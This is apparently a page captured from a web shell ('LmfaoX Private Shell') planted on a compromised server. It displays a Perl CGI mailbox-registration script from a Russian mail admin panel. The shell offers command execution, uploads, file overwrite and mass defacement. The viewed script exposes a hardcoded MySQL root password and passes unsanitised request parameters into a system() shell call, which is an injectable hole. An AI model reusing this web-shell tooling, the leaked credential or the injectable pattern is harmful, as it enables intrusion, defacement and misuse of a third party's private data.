LmfaoX Private Shell.

Viewing file: mail.cgi (3.15 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

#!/usr/bin/perl

use DBI();
use CGI qw(:standard);

$authl = param("authl");
$authp = param("authp");
system "./auth.cgi mail.cgi $authl $authp";
$retcode = $? / 256;
if ($retcode ne "1") {exit;}

my $cooke = cookie('mail.miranet');
if ($cooke eq "") {print "<html><meta http-equiv=\"refresh\" content=\"0\"></html>"; exit;}
if ($cooke eq "0") {print "<html><body><h1>Forbidden</h1><hr>Недостаточно прав"; exit;}


$database="mail";
$hostname="127.0.0.1";
$port="3306";
$dbuser="root";
$dbpasswd="zopa25703";

$dsn = "DBI:mysql:database=$database;host=$hostname;port=$port";
$dbh = DBI->connect_cached($dsn, $dbuser, $dbpasswd) || die;

#print "Content-type: text/html\n\n";
open(patt,"<./patt_n1.html")||die "Pattern file 1 not found";
while(<patt>)
    {
    print;
    }
close(patt);
#------------------------------------------------------------------
print "
<center><table border=0 cellspacing=0><tr><td bgcolor=#004070>
<center><font color=#ffff00 face=\"arial\" size=4><b>Регистрация почтового ящика</b></font>
</td></tr><tr><td>
<table bgcolor=#005090>
<form name=\"form1\" action=\"reg.cgi\" method=\"POST\">
<tr><td><br><font color=#ffffff face=\"arial\">Почтовый ящик:</font></td><td><br><input type=\"text\" name=\"uname\"><font color=#ffffff face=\"arial\"> \@ <select name=\"dom\"></font>";
$sth = $dbh->prepare("SELECT * FROM transport");
$sth->execute();
#if ($cooke ne "1") {print "<option value=yalagina.ru >yalagina.ru</option>";}
#if ($cooke eq "1")
#{
    while (my ($domain) = $sth->fetchrow_array())
        {
        if ($cooke eq "1") {print "<option value=$domain >$domain</option>";}
        else 
            {
            if ($cooke eq $domain) {print "<option value=$domain >$domain</option>";}
            }
        }
#}
#"<option value=miranet.ru >miranet.ru</option><option value=la2.su >la2.su</option><option value=la2net.ru >la2net.ru</option>"

print "</select></td></tr>
<tr><td><font color=#ffffff face=\"arial\">Имя пользователя:</font></td><td><input type=\"text\" name=\"un\">
<font color=#ffffff face=\"arial\"><input type=\"checkbox\" name=\"asmb\" checked> как имя почтового ящика</font></td></tr>
<tr><td><font color=#ffffff face=\"arial\">Пароль:</font></td><td><input type=\"password\" name=\"passwd1\"></td></tr>
<tr><td><font color=#ffffff face=\"arial\">Повтор пароля:</font></td><td><input type=\"password\" name=\"passwd2\"></td></tr>
<tr><td><font color=#ffffff face=\"arial\">Лимит:</font></td><td><input type=\"text\" name=\"quot\" value=\"20\"><font color=#ffffff face=\"arial\"> МБ (не более 1024)</font></td></tr>
<tr><td><font color=#ffffff face=\"arial\">Коментарий:</font></td><td><input type=\"text\" name=\"comment\"></td></tr>

<tr><td><hr></td><td><hr></td></tr>
<tr><td></td><td><input type=\"submit\" value=\"Ok\" /></td></tr>
</table></td></tr></table>
</b></center></form>
<hr>\n
</center><b>| <a href=\"manage.cgi\">Учётные записи</a> |";
if ($cooke eq "1") {print " <a href=\"domain.cgi\">Настройка доменов</a> |";}
print "</b>";

$dbh->disconnect();

#------------------------------------------------------------------
open(patt,"<./patt_n2.html")||die "Pattern file 2 not found";
while(<patt>)
    {
    print;
    }
close(patt);
system ("../../counter.cgi mail");
Command:
Quick Commands:
Upload:	[OK] Max size: 100MB
PHP Filesystem:	<@з
Search File:	regexp
Create File:	Overwrite [OK]
View File:
Mass Defacement:	[+] Main Directory: [+] Defacement Url: